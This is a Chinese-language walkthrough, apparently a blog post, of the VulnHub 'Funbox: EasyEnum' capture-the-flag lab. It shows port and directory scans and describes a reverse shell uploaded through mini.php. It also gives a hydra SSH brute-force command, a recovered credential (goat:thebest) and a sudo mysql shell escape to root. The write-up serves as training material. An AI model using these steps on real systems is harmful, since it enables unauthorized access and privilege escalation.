VulnHub渗透测试实战靶场 - FUNBOX: EASYENUM

题目描述

Boot2root in 6 steps for script-kiddies.

Timeframe to root this box: 20 mins to never ever. It's on you.

HINTS:
Enum without sense, costs you too many time:
  1.Use "Daisys best friend" for information gathering.
  2.Visit "Karla at home".
  3.John and Hydra loves only rockyou.txt
  4.Enum/reduce the users to brute force with or brute force the rest of your life.

This works better with VirtualBox rather than VMware

环境下载

FUNBOX: EASYENUM靶机搭建

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
  • 目标靶机的 IP 地址为:192.168.56.115
  • 攻击机的 IP 地址为:192.168.56.102

渗透测试

信息搜集

用 Nmap 扫描一下目标靶机的端口信息:sudo nmap -sS -A -Pn 192.168.56.115,发现开放了 22、80、110、143 四个端口

用 dirb 扫描一下 80 端口 web 目录:dirb http://192.168.56.115

漏洞挖掘

  • 根据扫描的结果访问 http://192.168.56.115/robots.txthttp://192.168.56.115/secret/,得到以下信息
Allow: Enum_this_Box

æ ¹å¯†ç æ˜¯ç”¨æˆ·å¯†ç çš„ç»„åˆï¼šharrysallygoatoraclelissy 
  • 暂时没发现什么可以利用的地方,用 gobuster 再次扫描一下目录,发现一个文件很可疑 mini.php
gobuster dir -u http://192.168.56.115 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html.txt

getshell

  • 根据扫描结果,访问 http://192.168.56.115/mini.php,发现存在文件上传漏洞,上传一个 PHP-Shell 反弹马,起 nc 成功接收到反弹的 shell

提权

  • 查看用户时发现存在的用户名拼接起来就是 http://192.168.56.115/secret/ 中的内容
  • 利用 hydra 爆破密码,得到一组可以利用的用户名和密码:goat:thebest
hydra -l username -P rockyou.txt -V 192.168.56.115 ssh
  • 切换用户到 goat,查看 sudo -l,发现可以利用 mysql 来进行提权,成功拿到 root 权限
sudo /usr/bin/mysql -e '\! /bin/sh'
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值